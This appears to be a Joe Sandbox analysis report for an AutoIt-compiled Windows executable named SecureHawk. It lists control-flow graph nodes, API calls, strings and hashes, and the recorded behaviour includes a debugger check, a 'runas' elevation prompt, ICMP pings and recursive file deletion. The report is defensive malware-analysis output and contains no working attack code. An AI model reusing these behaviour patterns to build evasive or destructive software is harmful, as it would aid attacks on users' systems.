3055f9 LoadLibraryA 103130->103132 103131->103123 103131->103124 103132->103131 103133 30560a GetProcAddress 103132->103133 103133->103131 103134 2f1055 103139 2f2a19 103134->103139 103137 312ea0 __cinit 67 API calls 103138 2f1064 103137->103138 103140 301207 59 API calls 103139->103140 103141 2f2a87 103140->103141 103146 2f1256 103141->103146 103143 2f2b24 103144 2f105a 103143->103144 103149 2f13c7 59 API calls 2 library calls 103143->103149 103144->103137 103150 2f1284 103146->103150 103149->103143 103151 2f1275 103150->103151 103152 2f1291 103150->103152 103151->103143 103152->103151 103153 2f1298 RegOpenKeyExW 103152->103153 103153->103151 103154 2f12b2 RegQueryValueExW 103153->103154 103155 2f12e8 RegCloseKey 103154->103155 103156 2f12d3 103154->103156 103155->103151 103156->103155 103157 32e368 103164 2f6152 Mailbox 103157->103164 103158 2f6af8 103218 35a2fa 89 API calls 4 library calls 103158->103218 103160 32ef1b 103219 346ad4 59 API calls Mailbox 103160->103219 103162 32ef24 103164->103158 103164->103160 103164->103162 103165 32e219 VariantClear 103164->103165 103167 36e3d4 130 API calls 103164->103167 103168 353fa7 3 API calls 103164->103168 103171 36ef7a 91 API calls 103164->103171 103172 365be2 103164->103172 103197 2fcfd7 103164->103197 103216 2f5190 59 API calls Mailbox 103164->103216 103217 347890 59 API calls 103164->103217 103165->103164 103167->103164 103168->103164 103171->103164 103173 365c0b 103172->103173 103174 365c39 WSAStartup 103173->103174 103176 2f502b 59 API calls 103173->103176 103175 365c62 103174->103175 103196 365c4d Mailbox 103174->103196 103220 3040cd 103175->103220 103178 365c26 103176->103178 103178->103174 103181 2f502b 59 API calls 103178->103181 103180 2f4d37 84 API calls 103182 365c77 103180->103182 103183 365c35 103181->103183 103225 30402a WideCharToMultiByte 103182->103225 103183->103174 103185 365c84 inet_addr gethostbyname 103186 365ca2 IcmpCreateFile 103185->103186 103185->103196 103187 365cc6 103186->103187 103186->103196 103188 310f16 Mailbox 59 API calls 103187->103188 103189 365cdf 103188->103189 103190 30433f 59 API calls 103189->103190 103191 365cea 103190->103191 103192 365d1a IcmpSendEcho 103191->103192 103193 365cf9 IcmpSendEcho 103191->103193 103194 365d32 103192->103194 103193->103194 103195 365d99 IcmpCloseHandle WSACleanup 103194->103195 103195->103196 103196->103164 103198 2f4d37 84 API calls 103197->103198 103199 2fd001 103198->103199 103200 2f5278 59 API calls 103199->103200 103201 2fd018 103200->103201 103202 2fd57b 103201->103202 103203 2f502b 59 API calls 103201->103203 103210 2fd439 Mailbox __wsetenvp 103201->103210 103202->103164 103203->103210 103204 31305f _W_store_winword 60 API calls 103204->103210 103205 310b90 62 API calls 103205->103210 103206 30162d 59 API calls 103206->103210 103207 2f4f98 59 API calls 103207->103210 103210->103202 103210->103204 103210->103205 103210->103206 103210->103207 103211 2f4d37 84 API calls 103210->103211 103212 2f502b 59 API calls 103210->103212 103213 301821 59 API calls 103210->103213 103214 3059d3 94 API calls 103210->103214 103215 305ac3 Shell_NotifyIconW 103210->103215 103235 30153b 59 API calls 2 library calls 103210->103235 103236 2f4f3c 59 API calls Mailbox 103210->103236 103211->103210 103212->103210 103213->103210 103214->103210 103215->103210 103216->103164 103217->103164 103218->103160 103219->103162 103221 310f16 Mailbox 59 API calls 103220->103221 103222 3040e0 103221->103222 103223 301c7e 59 API calls 103222->103223 103224 3040ed 103223->103224 103224->103180 103226 304085 103225->103226 103227 30404e 103225->103227 103234 303f20 59 API calls Mailbox 103226->103234 103228 310f16 Mailbox 59 API calls 103227->103228 103230 304055 WideCharToMultiByte 103228->103230 103233 303f79 59 API calls 2 library calls 103230->103233 103232 304077 103232->103185 103233->103232 103234->103232 103235->103210 103236->103210 103237 2f5ff5 103260 2f5ede Mailbox _memmove 103237->103260 103238 310f16 59 API calls Mailbox 103238->103260 103239 2f6a9b 103308 2fa9de 294 API calls 103239->103308 103240 2f53b0 294 API calls 103240->103260 103242 32ef29 103320 2f5190 59 API calls Mailbox 103242->103320 103244 32ef37 103321 35a2fa 89 API calls 4 library calls 103244->103321 103248 32ef1b 103294 2f5569 Mailbox 103248->103294 103319 346ad4 59 API calls Mailbox 103248->103319 103249 2f60e5 103250 32e067 103249->103250 103254 2f63bd Mailbox 103249->103254 103265 2f6abc 103249->103265 103267 2f6152 Mailbox 103249->103267 103250->103254 103309 347890 59 API calls 103250->103309 103252 301c9c 59 API calls 103252->103260 103253 301a36 59 API calls 103253->103260 103257 310f16 Mailbox 59 API calls 103254->103257 103266 2f6426 103254->103266 103259 2f63d1 103257->103259 103258 36c11d 294 API calls 103258->103260 103261 2f63de 103259->103261 103259->103265 103260->103238 103260->103239 103260->103240 103260->103242 103260->103244 103260->103249 103260->103252 103260->103253 103260->103258 103260->103265 103260->103294 103307 2f523c 59 API calls 103260->103307 103312 357d7e 59 API calls Mailbox 103260->103312 103313 346ad4 59 API calls Mailbox 103260->103313 103263 32e0a2 103261->103263 103264 2f6413 103261->103264 103310 36c644 85 API calls 2 library calls 103263->103310 103264->103266 103296 2f5447 Mailbox 103264->103296 103318 35a2fa 89 API calls 4 library calls 103265->103318 103311 36c791 95 API calls Mailbox 103266->103311 103267->103248 103267->103265 103283 32e219 VariantClear 103267->103283 103267->103294 103299 36e3d4 130 API calls 103267->103299 103300 353fa7 3 API calls 103267->103300 103301 365be2 95 API calls 103267->103301 103302 2fcfd7 98 API calls 103267->103302 103303 36ef7a 91 API calls 103267->103303 103306 2f5190 59 API calls Mailbox 103267->103306 103314 347890 59 API calls 103267->103314 103271 32e0cd 103271->103271 103272 2f69ff 103273 32e5c1 103272->103273 103274 32f095 103272->103274 103315 35a2fa 89 API calls 4 library calls 103273->103315 103323 35a2fa 89 API calls 4 library calls 103274->103323 103277 2f69fa 103286 301c9c 59 API calls 103277->103286 103280 301c9c 59 API calls 103280->103296 103281 310f16 59 API calls Mailbox 103281->103296 103282 32e5d0 103283->103267 103284 32e9ca 103287 301c9c 59 API calls 103284->103287 103286->103294 103287->103294 103289 301207 59 API calls 103289->103296 103290 32ea97 103290->103294 103316 347890 59 API calls 103290->103316 103291 312ea0 67 API calls __cinit 103291->103296 103292 347890 59 API calls 103292->103296 103295 32ee58 103317 35a2fa 89 API calls 4 library calls 103295->103317 103296->103272 103296->103273 103296->103277 103296->103280 103296->103281 103296->103284 103296->103289 103296->103290 103296->103291 103296->103292 103296->103294 103296->103295 103298 2f5a1a 103296->103298 103304 2f7e50 294 API calls 2 library calls 103296->103304 103305 2f6e30 60 API calls Mailbox 103296->103305 103322 35a2fa 89 API calls 4 library calls 103298->103322 103299->103267 103300->103267 103301->103267 103302->103267 103303->103267 103304->103296 103305->103296 103306->103267 103307->103260 103308->103265 103309->103254 103310->103266 103311->103271 103312->103260 103313->103260 103314->103267 103315->103282 103316->103294 103317->103298 103318->103248 103319->103294 103320->103248 103321->103248 103322->103294 103323->103294 103324 330128 103325 33012a 103324->103325 103328 354b85 SHGetFolderPathW 103325->103328 103329 301821 59 API calls 103328->103329 103330 330133 103329->103330

                                  Control-flow Graph

                                  APIs
                                  • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 0030526C
                                  • IsDebuggerPresent.KERNEL32 ref: 0030527E
                                  • GetFullPathNameW.KERNEL32(00007FFF,?,?), ref: 003052E6
                                    • Part of subcall function 00301821: _memmove.LIBCMT ref: 0030185B
                                    • Part of subcall function 002FBBC6: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 002FBC07
                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00305366
                                  • MessageBoxA.USER32(00000000,It is a violation of the AutoIt EULA to attempt to reverse engineer this program.,AutoIt,00000010), ref: 00340AAE
                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00340AE6
                                  • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,003A5230), ref: 00340B69
                                  • ShellExecuteW.SHELL32(00000000), ref: 00340B70
                                    • Part of subcall function 0030514C: GetSysColorBrush.USER32(0000000F), ref: 00305156
                                    • Part of subcall function 0030514C: LoadCursorW.USER32(00000000,00007F00), ref: 00305165
                                    • Part of subcall function 0030514C: LoadIconW.USER32(00000063), ref: 0030517C
                                    • Part of subcall function 0030514C: LoadIconW.USER32(000000A4), ref: 0030518E
                                    • Part of subcall function 0030514C: LoadIconW.USER32(000000A2), ref: 003051A0
                                    • Part of subcall function 0030514C: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 003051C6
                                    • Part of subcall function 0030514C: RegisterClassExW.USER32(?), ref: 0030521C
                                    • Part of subcall function 003050DB: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00305109
                                    • Part of subcall function 003050DB: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 0030512A
                                    • Part of subcall function 003050DB: ShowWindow.USER32(00000000), ref: 0030513E
                                    • Part of subcall function 003050DB: ShowWindow.USER32(00000000), ref: 00305147
                                    • Part of subcall function 003059D3: _memset.LIBCMT ref: 003059F9
                                    • Part of subcall function 003059D3: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00305A9E
                                  Strings
                                  • AutoIt, xrefs: 00340AA3
                                  • runas, xrefs: 00340B64
                                  • It is a violation of the AutoIt EULA to attempt to reverse engineer this program., xrefs: 00340AA8
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
                                  • String ID: AutoIt$It is a violation of the AutoIt EULA to attempt to reverse engineer this program.$runas
                                  • API String ID: 529118366-2030392706
                                  • Opcode ID: 218adb5afc4ce71e2fae09e91d22cf1a9926c8f7862a0835b5fcfc655ae0126b
                                  • Instruction ID: 23bc372e407f6a55e1275a0d0e7d52b704a4caec6208fb5a17ffd5d0f309903f
                                  • Opcode Fuzzy Hash: 218adb5afc4ce71e2fae09e91d22cf1a9926c8f7862a0835b5fcfc655ae0126b
                                  • Instruction Fuzzy Hash: 95510431A0520CAEDB07ABB0DC66EEE7B7CEF49344F1445A5F651AA1E3CA7459058B20

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1159 305d13-305d73 call 301207 GetVersionExW call 301821 1164 305e78-305e7a 1159->1164 1165 305d79 1159->1165 1166 340f29-340f35 1164->1166 1167 305d7c-305d81 1165->1167 1168 340f36-340f3a 1166->1168 1169 305d87 1167->1169 1170 305e7f-305e80 1167->1170 1172 340f3c 1168->1172 1173 340f3d-340f49 1168->1173 1171 305d88-305dbf call 301981 call 30133d 1169->1171 1170->1171 1181 305dc5-305dc6 1171->1181 1182 341018-34101b 1171->1182 1172->1173 1173->1168 1174 340f4b-340f50 1173->1174 1174->1167 1176 340f56-340f5d 1174->1176 1176->1166 1178 340f5f 1176->1178 1183 340f64-340f6a 1178->1183 1185 340f6f-340f7a 1181->1185 1186 305dcc-305dcf 1181->1186 1187 341034-341038 1182->1187 1188 34101d 1182->1188 1184 305e00-305e17 GetCurrentProcess IsWow64Process 1183->1184 1193 305e19 1184->1193 1194 305e1c-305e2d 1184->1194 1189 340f97-340f99 1185->1189 1190 340f7c-340f82 1185->1190 1186->1184 1191 305dd1-305def 1186->1191 1195 341023-34102c 1187->1195 1196 34103a-341043 1187->1196 1192 341020 1188->1192 1200 340fbc-340fbf 1189->1200 1201 340f9b-340fa7 1189->1201 1197 340f84-340f87 1190->1197 1198 340f8c-340f92 1190->1198 1191->1184 1199 305df1-305df7 1191->1199 1192->1195 1193->1194 1203 305e98-305ea2 GetSystemInfo 1194->1203 1204 305e2f-305e3f call 3055f0 1194->1204 1195->1187 1196->1192 1202 341045-341048 1196->1202 1197->1184 1198->1184 1199->1183 1205 305dfd 1199->1205 1209 340fe5-340fe8 1200->1209 1210 340fc1-340fd0 1200->1210 1206 340fb1-340fb7 1201->1206 1207 340fa9-340fac 1201->1207 1202->1195 1208 305e65-305e75 1203->1208 1216 305e41-305e4e call 3055f0 1204->1216 1217 305e8c-305e96 GetSystemInfo 1204->1217 1205->1184 1206->1184 1207->1184 1209->1184 1215 340fee-341003 1209->1215 1212 340fd2-340fd5 1210->1212 1213 340fda-340fe0 1210->1213 1212->1184 1213->1184 1218 341005-341008 1215->1218 1219 34100d-341013 1215->1219 1224 305e50-305e54 GetNativeSystemInfo 1216->1224 1225 305e85-305e8a 1216->1225 1220 305e56-305e5a 1217->1220 1218->1184 1219->1184 1220->1208 1222 305e5c-305e5f FreeLibrary 1220->1222 1222->1208 1224->1220 1225->1224
                                  APIs
                                  • GetVersionExW.KERNEL32(?), ref: 00305D40
                                    • Part of subcall function 00301821: _memmove.LIBCMT ref: 0030185B
                                  • GetCurrentProcess.KERNEL32(?,00380A18,00000000,00000000,?), ref: 00305E07
                                  • IsWow64Process.KERNEL32(00000000), ref: 00305E0E
                                  • GetNativeSystemInfo.KERNEL32(00000000), ref: 00305E54
                                  • FreeLibrary.KERNEL32(00000000), ref: 00305E5F
                                  • GetSystemInfo.KERNEL32(00000000), ref: 00305E90
                                  • GetSystemInfo.KERNEL32(00000000), ref: 00305E9C
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
                                  • String ID:
                                  • API String ID: 1986165174-0
                                  • Opcode ID: dd625557816cc9a9b6730381a568b472e681327454b4c951fd7e93ee051b21e2
                                  • Instruction ID: ade92d77af5c7908ca8196a2f624100284efbbc0d421fb90b7a7149d493090fc
                                  • Opcode Fuzzy Hash: dd625557816cc9a9b6730381a568b472e681327454b4c951fd7e93ee051b21e2
                                  • Instruction Fuzzy Hash: A091B43154ABC4DEC737CB7894645ABFFE56F29300B88499ED0C797A81D230B548CB59

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1267 353e72-353eb9 call 301207 * 3 call 3101af call 354e59 1278 353ec9-353efa call 310044 FindFirstFileW 1267->1278 1279 353ebb-353ec4 call 301900 1267->1279 1283 353efc-353efe 1278->1283 1284 353f69-353f70 FindClose 1278->1284 1279->1278 1283->1284 1286 353f00-353f05 1283->1286 1285 353f74-353f96 call 301cb6 * 3 1284->1285 1288 353f44-353f56 FindNextFileW 1286->1288 1289 353f07-353f42 call 301c9c call 3017e0 call 301900 DeleteFileW 1286->1289 1288->1283 1290 353f58-353f5e 1288->1290 1289->1288 1302 353f60-353f67 FindClose 1289->1302 1290->1283 1302->1285
                                  APIs
                                    • Part of subcall function 003101AF: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00302A58,?,00008000), ref: 003101CF
                                    • Part of subcall function 00354E59: GetFileAttributesW.KERNEL32(?,00353A6B), ref: 00354E5A
                                  • FindFirstFileW.KERNEL32(?,?), ref: 00353EE9
                                  • DeleteFileW.KERNEL32(?,?,?,?), ref: 00353F39
                                  • FindNextFileW.KERNEL32(00000000,00000010), ref: 00353F4A
                                  • FindClose.KERNEL32(00000000), ref: 00353F61
                                  • FindClose.KERNEL32(00000000), ref: 00353F6A
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                  • String ID: \*.*
                                  • API String ID: 2649000838-1173974218
                                  • Opcode ID: ef40d9e56aebe82c4cad582feb2ca6fa11fa7942837e95e6634b9f484c384878
                                  • Instruction ID: 40301f76b5e7127da46fb4ff5e2f9d89bec89b7e02e0ac1339dd30c0c3744d2a
                                  • Opcode Fuzzy Hash: ef40d9e56aebe82c4cad582feb2ca6fa11fa7942837e95e6634b9f484c384878
                                  • Instruction Fuzzy Hash: 2331A0310493459BC307EB64C8959AFB7ECBE95341F400E1DF8D1961E1EB60EA0CC7A2
                                  APIs
                                    • Part of subcall function 00303740: CharUpperBuffW.USER32(?,003B61DC,00000000,?,00000000,003B61DC,?,002F53A5,?,?,?,?), ref: 0030375D
                                  • _memmove.LIBCMT ref: 002FB68A
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: BuffCharUpper_memmove
                                  • String ID: pr;
                                  • API String ID: 2819905725-129123090
                                  • Opcode ID: f88ca08e9ff69d48b6c32171e1047bcc9683a00109b92640d759d2780f49d6f9
                                  • Instruction ID: afe71c790fc6af81c87dc153349d5e9b995d3739d6673e95028e7414fc5b1b87
                                  • Opcode Fuzzy Hash: f88ca08e9ff69d48b6c32171e1047bcc9683a00109b92640d759d2780f49d6f9
                                  • Instruction Fuzzy Hash: 2DA299706183458FD726DF14C480B2AF7E1BF88344F14896DEA9A8B361D7B1ED95CB82
                                  APIs
                                  • GetFileAttributesW.KERNEL32(?,0033FC06), ref: 003547C7
                                  • FindFirstFileW.KERNEL32(?,?), ref: 003547D8
                                  • FindClose.KERNEL32(00000000), ref: 003547E8
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: FileFind$AttributesCloseFirst
                                  • String ID:
                                  • API String ID: 48322524-0
                                  • Opcode ID: 290a13020caee81a4a3640572a06001b70b34c3d09c41a918cf90b4c091b6f06
                                  • Instruction ID: f17da1ff9c1e7313d54bf2ffc49ca9172119836a130e05e8a44d21de1143b3a3
                                  • Opcode Fuzzy Hash: 290a13020caee81a4a3640572a06001b70b34c3d09c41a918cf90b4c091b6f06
                                  • Instruction Fuzzy Hash: 41E0DF35810711AB821A6738EC4DCEA375C9E0A33AF100B95F931C21E0EBB09D888796
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 0452118cfa7267504289f05df73e3e94dab5a96ba01969d0297ff4b965615bc5
                                  • Instruction ID: ab9fdf1a282e85485c8b3f1baa9a7ea6c7cdc0bb41b6313a37b066bc8b3601c2
                                  • Opcode Fuzzy Hash: 0452118cfa7267504289f05df73e3e94dab5a96ba01969d0297ff4b965615bc5
                                  • Instruction Fuzzy Hash: 55229B7092020A8FDB29DF54C481BBAF7B0FF49380F148179EA56AB351D3B1A9D5CB91
                                  APIs
                                  • CloseHandle.KERNEL32 ref: 00310E05
                                  • CreateToolhelp32Snapshot.KERNEL32 ref: 00310E17
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: CloseCreateHandleSnapshotToolhelp32
                                  • String ID:
                                  • API String ID: 3280610774-0
                                  • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                  • Instruction ID: 8d115e10f9ac35980fbc37cb3639bd6ee6759ed67daf5b9d63f05bd5b1554c61
                                  • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                  • Instruction Fuzzy Hash: 82311374A00109DBCB1EDF59D4809A9FBA6FF89300B6586A5E40ACB651DBB0EDC1CBD0
                                  APIs
                                  • timeGetTime.WINMM ref: 002FBF57
                                    • Part of subcall function 002F52B0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 002F52E6
                                  • Sleep.KERNEL32(0000000A,?,?), ref: 003335E5
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: MessagePeekSleepTimetime
                                  • String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID$CALL$pr;$pr;$pr;$pr;
                                  • API String ID: 1792118007-2584490237
                                  • Opcode ID: 70ff84bf9a3963bbecac3069d1e8a1e72bb2b9b0a0bf970d2289afdd9001bc34
                                  • Instruction ID: 9793c7c0bec29e77131b8e473fc9cc759c3849cd5de2b75c723374436ba45035
                                  • Opcode Fuzzy Hash: 70ff84bf9a3963bbecac3069d1e8a1e72bb2b9b0a0bf970d2289afdd9001bc34
                                  • Instruction Fuzzy Hash: C7C2AE70608345DFD72ADF24C895BAAF7E4BF84344F14892DF58A8B2A1CB71E954CB42

                                  Control-flow Graph

                                  APIs
                                  • GetSysColorBrush.USER32(0000000F), ref: 002F3444
                                  • RegisterClassExW.USER32(00000030), ref: 002F346E
                                  • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 002F347F
                                  • InitCommonControlsEx.COMCTL32(?), ref: 002F349C
                                  • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 002F34AC
                                  • LoadIconW.USER32(000000A9), ref: 002F34C2
                                  • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 002F34D1
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                  • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                  • API String ID: 2914291525-1005189915
                                  • Opcode ID: ee8ad1252548a02cdc76edb6921b067ee0f24d213d4568a2990c449443a98440
                                  • Instruction ID: 3688999fbd17a1dd47be1d79d56020e95346fb030bf43f292401615d8bc7169d
                                  • Opcode Fuzzy Hash: ee8ad1252548a02cdc76edb6921b067ee0f24d213d4568a2990c449443a98440
                                  • Instruction Fuzzy Hash: 08315EB1840349EFEB829FA4D885BD9BFF8FF09314F10469AE690E62A1D3B90545CF50

                                  Control-flow Graph

                                  APIs
                                  • GetSysColorBrush.USER32(0000000F), ref: 002F3444
                                  • RegisterClassExW.USER32(00000030), ref: 002F346E
                                  • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 002F347F
                                  • InitCommonControlsEx.COMCTL32(?), ref: 002F349C
                                  • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 002F34AC
                                  • LoadIconW.USER32(000000A9), ref: 002F34C2
                                  • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 002F34D1
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
